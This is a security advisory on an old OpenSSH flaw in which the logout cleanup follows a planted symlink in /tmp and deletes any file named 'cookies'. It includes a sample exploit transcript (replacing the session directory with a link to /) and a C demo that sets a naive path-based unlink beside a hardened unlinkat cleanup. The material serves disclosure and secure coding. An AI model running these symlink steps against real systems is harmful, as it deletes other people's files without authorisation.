
OpenSSH - delete cookies file
Vulnerability

    OpenSSH

Affected

    OpenSSH

Description

    'zen-parse' found the following. You can delete any file on the
    filesystem you want... as long as it's called cookies. Not really
    a very useful bug, but it could cause annoyances to people who
    actually like their cookies.

    Sample exploit:

        [root@clarity /root]# touch /cookies;ls /cookies
        /cookies
        [root@clarity /root]# ssh zen@localhost
        zen@localhost's password:
        Last login: Mon Jun  4 20:22:39 2001 from localhost.local
        Linux clarity 2.2.19-7.0.1 #1 Tue Apr 10 01:56:16 EDT 2001 i686 unknown
        [zen@clarity zen]$ rm -r /tmp/ssh-XXW9hNY9/; ln -s / /tmp/ssh-XXW9hNY9
        [zen@clarity zen]$ logout
        Connection to localhost closed.
        [root@clarity /root]# ls /cookies
        /bin/ls: /cookies: No such file or directory

    Tested on Red Hat Linux release 7.0 (Guinness):

        [zen-parse@clarity zen-parse]$ rpm -qf /usr/sbin/sshd
        openssh-server-2.5.2p2-1.7.2
        [zen-parse@clarity zen-parse]$ ssh -V
        OpenSSH_2.5.2p2, SSH protocols 1.5/2.0, OpenSSL 0x0090581f

    The configuration file has not been modified from the default
    settings. Although sshd does drop root privileges, the process's
    supplementary groups are not cleared. (Observed in /proc/$$/status
    of the sshd handling the session, and in the output of strace and
    ltrace: there is no initgroups() call in the ltrace output of the
    process that creates the directory, although it does change its
    euid beforehand, and there is no setgroups() call in the strace
    output.)

    The file itself is  created with O_EXCL so  a symlink in place  of
    the file cannot be used to create/overwrite arbitrary files.

    This vulnerability works  fine on both  RedHat 7.1 &  7.0 with the
    latest updated packages from RedHat installed.

    Jerry Connolly tested it on OpenSSH_2.5.2 on OpenBSD and it
    worked. He had to enable X forwarding on the client and server
    before the remote machine would create (and attempt to unlink())
    the cookies file. The offending code is in session.c in the
    xauthfile_cleanup_proc() function:

        <SNIP>
        /*
         * Remove local Xauthority file.
         */
        void
        xauthfile_cleanup_proc(void *ignore)
        {
            debug("xauthfile_cleanup_proc called");
        
            if (xauthfile != NULL) {
                char *p;
                unlink(xauthfile);
        </SNIP>

    where xauthfile  points to  a buffer  containing the  name of  the
    cookies file.
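    The root cause is that the cleanup re-resolves a path string at
    logout, by which time the user has swapped the session directory
    for a symlink. The following is an added example, not OpenSSH's
    code and not from the advisory, that puts the path-based unlink()
    next to a cleanup which opens the session directory with
    O_NOFOLLOW, checks that the opened object is a directory owned by
    the session user, and then removes the file with unlinkat()
    relative to that descriptor, so no path component can be redirected
    in between. It assumes Linux (POSIX.1-2008 calls); the directory
    layout, the cookies files and the planted symlink are constructed
    under a fresh temp directory purely for the demonstration.

```c
#ifndef _GNU_SOURCE
#define _GNU_SOURCE   /* O_NOFOLLOW, O_DIRECTORY, unlinkat(), mkdtemp() */
#endif
#include <errno.h>
#include <fcntl.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Naive cleanup, the pattern the advisory describes: unlink() on an assembled
 * path. Every component is resolved at call time, so if `dir` has been replaced
 * by a symlink the file removed is whatever the link points at. */
int naive_cleanup(const char *dir, const char *name)
{
    char path[PATH_MAX];
    if (snprintf(path, sizeof path, "%s/%s", dir, name) >= (int)sizeof path)
        return -1;
    return unlink(path);
}

/* Hardened cleanup: open the directory itself with O_NOFOLLOW (fails with ELOOP
 * if a symlink sits there), verify the opened object is a directory owned by
 * the session user and not writable by others, then unlink relative to that
 * descriptor so no further path resolution can be hijacked. */
int safe_cleanup(const char *dir, const char *name, uid_t owner)
{
    struct stat st;
    int dfd, rc, saved;

    if (strchr(name, '/') != NULL) {   /* name must be a single component */
        errno = EINVAL;
        return -1;
    }
    dfd = open(dir, O_RDONLY | O_DIRECTORY | O_NOFOLLOW | O_CLOEXEC);
    if (dfd < 0)
        return -1;
    if (fstat(dfd, &st) < 0 || !S_ISDIR(st.st_mode) || st.st_uid != owner ||
        (st.st_mode & (S_IWGRP | S_IWOTH)) != 0) {
        close(dfd);
        errno = EPERM;
        return -1;
    }
    rc = unlinkat(dfd, name, 0);
    saved = errno;
    close(dfd);
    errno = saved;
    return rc;
}

/* 1 if `path` exists (lstat, so the link itself is what is tested). */
int path_exists(const char *path)
{
    struct stat st;
    return lstat(path, &st) == 0;
}

/* Empty file created with O_EXCL, the flag the advisory credits for blocking
 * symlink-based overwrite at creation time. */
static int make_file(const char *path)
{
    int fd = open(path, O_WRONLY | O_CREAT | O_EXCL, 0600);
    return fd < 0 ? -1 : close(fd);
}

/* Constructed demo layout under a fresh temp directory (path left in `base`):
 *   <base>/real/cookies       genuine session directory with its cookie file
 *   <base>/victim/cookies     the file the attacker wants removed
 *   <base>/session -> victim  symlink planted where the daemon expects its dir */
int build_scenario(char *base, size_t len)
{
    char p[PATH_MAX];
    if (len < sizeof "/tmp/xauth-demo.XXXXXX")
        return -1;
    strcpy(base, "/tmp/xauth-demo.XXXXXX");
    if (mkdtemp(base) == NULL)
        return -1;
    snprintf(p, sizeof p, "%s/real", base);
    if (mkdir(p, 0700) < 0) return -1;
    snprintf(p, sizeof p, "%s/real/cookies", base);
    if (make_file(p) < 0) return -1;
    snprintf(p, sizeof p, "%s/victim", base);
    if (mkdir(p, 0700) < 0) return -1;
    snprintf(p, sizeof p, "%s/victim/cookies", base);
    if (make_file(p) < 0) return -1;
    snprintf(p, sizeof p, "%s/session", base);
    return symlink("victim", p);
}

int main(void)
{
    char base[PATH_MAX], dir[PATH_MAX], victim[PATH_MAX];
    if (build_scenario(base, sizeof base) < 0) { perror("build_scenario"); return 1; }
    snprintf(dir, sizeof dir, "%s/session", base);
    snprintf(victim, sizeof victim, "%s/victim/cookies", base);
    printf("safe_cleanup through symlink:  %d\n", safe_cleanup(dir, "cookies", getuid()));
    printf("victim still present:          %d\n", path_exists(victim));
    printf("naive_cleanup through symlink: %d\n", naive_cleanup(dir, "cookies"));
    printf("victim still present:          %d\n", path_exists(victim));
    return 0;
}
```

    Run as an unprivileged user: the hardened routine refuses the
    planted symlink (the open fails with ELOOP) and the victim file
    survives, while the naive routine removes it. The ownership and
    mode checks matter even without a symlink in play, because the
    per-session directory lives under a world-writable /tmp and the
    daemon must not trust what it finds there at logout.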

Solution

    Fixed in openssh's cvs (see www.openssh.com).
